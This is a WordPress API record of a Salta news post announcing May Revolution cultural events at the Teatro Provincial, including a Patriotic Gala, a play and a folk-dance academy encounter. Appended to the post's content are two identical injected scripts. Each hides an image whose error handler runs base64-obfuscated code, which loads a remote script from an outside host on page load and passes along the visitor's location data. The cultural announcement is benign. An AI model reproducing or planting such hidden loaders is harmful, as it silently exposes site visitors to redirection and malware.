{"id":3974,"date":"2024-05-08T08:58:21","date_gmt":"2024-05-08T11:58:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3974"},"modified":"2025-08-13T23:56:22","modified_gmt":"2025-08-14T02:56:22","slug":"revolucion-de-mayo-se-aproxima-una-nueva-gala-patriotica-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3974","title":{"rendered":"Revoluci\u00f3n de Mayo: se aproxima una nueva Gala Patri\u00f3tica en el Teatro Provincial"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-69b52fdff74c5ae84d782ccf477b4786\" style=\"background-color:#7e0744\"><em>Se presentar\u00e1 un ciclo de actividades culturales con el prop\u00f3sito de honrar esta importante fecha, convocando a toda la comunidad a sumarse la celebraci\u00f3n que promueve el encuentro y la unidad entre todas las provincias del NOA.<\/em><\/h4>\n\n\n\n<p>Mayo es un mes profundamente significativo para los argentinos y salte\u00f1os, es por ello que la\u00a0<strong>Secretar\u00eda de Cultura<\/strong>\u00a0y el\u00a0<strong>Instituto de M\u00fasica<\/strong>\u00a0invitan a celebrar un nuevo aniversario de la Revoluci\u00f3n de Mayo con diferentes actividades culturales.<\/p>\n\n\n\n<p>El esp\u00edritu patri\u00f3tico caracter\u00edstico de Mayo nos invita a celebrar la soberan\u00eda nacional, destacando la Revoluci\u00f3n de Mayo como el hito fundamental que dio inicio al proceso de independencia de Argentina.<\/p>\n\n\n\n<p>En este contexto, el Ballet Folkl\u00f3rico de la Provincia presentar\u00e1 un ciclo de actividades culturales con el prop\u00f3sito de honrar esta importante fecha, convocando a toda la comunidad a sumarse la celebraci\u00f3n que promueve el encuentro y la unidad entre todas las provincias del NOA.<\/p>\n\n\n\n<p>Bajo el lema \u00abAl Son del 25\u00bb, se realizar\u00e1 la presentaci\u00f3n de la Gala Patri\u00f3tica en la v\u00edspera del aniversario de la Revoluci\u00f3n de Mayo. El Ballet Folkl\u00f3rico y la Orquesta Sinf\u00f3nica de la provincia se unen en un espect\u00e1culo de repertorio tradicional en homenaje al 25 de Mayo. La velada se llevar\u00e1 a cabo desde las 21 horas en el Teatro Provincial, con entrada libre y gratuita.<\/p>\n\n\n\n<p>El 25 de Mayo se presentar\u00e1 \u00abDe Patria, Amor y Libertad\u00bb, inspirada en el libro \u00abLa Patria de las Mujeres\u00bb de Elsa Drucaroff, esta obra rinde homenaje a las mujeres que participaron en la revoluci\u00f3n patria. La funci\u00f3n comenzar\u00e1 a las 21 horas en el Teatro Provincial, con un valor de entrada de $2000. Estudiantes y adultos mayores contar\u00e1n con entradas libre y gratuita.<\/p>\n\n\n\n<p>Finalmente, el d\u00eda 26 de mayo se llevar\u00e1 a cabo el \u00ab2do Encuentro Provincial de Academias Folkl\u00f3ricas del NOA\u00bb &#8211; Desde las 18 horas en adelante, el Teatro Provincial ser\u00e1 el escenario del segundo encuentro de academias folkl\u00f3ricas del NOA. La entrada tiene un valor de $2000, con acceso gratuito para estudiantes y adultos mayores.<\/p>\n\n\n\n<p><strong>2do Encuentro Provincial de Academias Folkl\u00f3ricas del NOA 2024<\/strong><\/p>\n\n\n\n<p>El domingo 26 de mayo a las 18:00 horas, el Teatro Provincial, Zuviria 70, ser\u00e1 testigo del segundo encuentro provincial de academias folkl\u00f3ricas del NOA.<\/p>\n\n\n\n<p>El evento tiene como objetivo conmemorar el 25 de mayo de 1810 a trav\u00e9s de expresiones art\u00edsticas y sociales. Durante la jornada, diversas academias de danza folkl\u00f3rica de nuestra provincia y del NOA presentar\u00e1n cuadros folkl\u00f3ricos, destacando la riqueza cultural de nuestra regi\u00f3n.<\/p>\n\n\n\n<p>Las inscripciones para participar est\u00e1n abiertas hasta el 17 de mayo a trav\u00e9s del siguiente FORMULARIO DE INSCRIPCI\u00d3N<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSdxAs9n3bgMg1pRaY5-VxWgEJH_g4hFvrtH7fv8LHnubCnqpw\/viewform?usp=send_form\n<\/div><\/figure>\n\n\n\n<p>Algunos requisitos importantes a tener en cuenta: Cada academia podr\u00e1 presentar un cuadro folk\u00f3rico de hasta 7 minutos de duraci\u00f3n, en cualquiera de sus modalidades: estilizado, tradicional y malambo, o la combinaci\u00f3n de \u00e9stas; El cupo m\u00e1ximo de artistas en escena es de hasta 20; y, la edad de los bailarines de academia debe ser mayor a 14 a\u00f1os, conformando un ballet juvenil, mayor o adulto.<\/p>\n\n\n\n<p>\u201cEs enriquecedor mantener viva esta tradici\u00f3n patri\u00f3tica que nos permite conectar con nuestra historia. Renovar la presencia del p\u00fablico local a\u00f1o tras a\u00f1o, con diferentes agrupaciones art\u00edsticas y propuestas esc\u00e9nicas, es un reflejo del trabajo conjunto y compromiso con nuestra identidad cultural\u201d manifest\u00f3 Daniel Espoz, director del Ballet Folkl\u00f3rico de la Provincia.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, pueden comunicarse a trav\u00e9s del correo electr\u00f3nico balletfolkloricodesalta@gmail.com o al tel\u00e9fono 422-9239.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/revolucion-de-mayo-se-aproxima-una-nueva-gala-patriotica-en-el-teatro-provincial-95389\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se presentar\u00e1 un ciclo de actividades culturales con el prop\u00f3sito de honrar esta importante fecha, convocando a toda la comunidad a sumarse la celebraci\u00f3n que promueve el encuentro y la unidad entre todas las provincias del NOA. Mayo es un mes profundamente significativo para los argentinos y salte\u00f1os, es por ello que la\u00a0Secretar\u00eda de Cultura\u00a0y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3975,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3974","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3974"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3974"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3974\/revisions"}],"predecessor-version":[{"id":6792,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3974\/revisions\/6792"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3975"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}